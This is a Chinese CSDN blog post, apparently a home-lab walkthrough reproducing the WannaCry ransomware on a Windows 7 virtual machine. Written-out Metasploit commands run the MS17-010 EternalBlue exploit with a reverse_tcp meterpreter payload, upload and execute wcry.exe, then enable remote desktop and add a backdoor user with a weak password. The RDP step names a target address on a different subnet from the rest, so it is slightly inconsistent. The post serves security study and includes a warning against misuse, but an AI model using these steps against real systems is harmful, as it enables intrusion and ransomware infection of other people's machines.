勒索病毒“WannaCry”复现

漏洞简介

永恒之蓝利用Windows系统的SMB漏洞可以获取系统的最高权限,然后通过恶意代码扫描开放445端口的Windows系统;只要是被扫描到的Windows系统,只要开机上线,不需要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等恶意程序。

准备过程

0x00:做好防护

在复现过程中需要先做好防护,以免造成真机感染病毒,那就GG了
在这里插入图片描述
先将共享文件夹给禁用掉,为了以防万一这里再把真机的入站规则改一下,阻止445端口连接在这里插入图片描述

0x02:实验环境

kail:192.168.186.134
win7:192.168.186.131
病毒样本

漏洞复现

WannaCry是在永恒之蓝的基础上产生的,因此需要先通过永恒之蓝获得shell权限。

永恒之蓝的编号是MS17-010,先使用msfconsole搜索一下漏洞模块

search ms17-010

在这里插入图片描述
这里先使用下

auxiliary/scanner/smb/smb_ms17_010

这个作为搜索模块对靶机进行漏洞扫描
在这里插入图片描述
发现存在漏洞(注意在虚拟机中win7靶机需要关闭防火墙才可以发现),既然有漏洞那下面就使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置一下靶机的IP地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.186.131

再设置下攻击的payload,这里选择

windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
最后再设置一下攻击机的IP即可

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.186.134

在这里插入图片描述
进行攻击

exploit

在这里插入图片描述
攻击成功,将我们前面准备好的WannaCry病毒上传进去对方的主机中

upload /tmp/wcry.exe c://

在这里插入图片描述
进入shell权限,dir一下,发现上传成功
在这里插入图片描述
执行病毒即可

c:\>wcry.exe

在这里插入图片描述
接下来使用一下enable_rdp 脚本来开启远程桌面

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=shy2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

远程桌面连接Win7

rdesktop 192.168.190.131:3389

在这里插入图片描述
复现成功

总结:

复现该病毒时一定要注意做好防护,这类病毒的传播性很强切勿用于恶作剧,切记切记!

©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页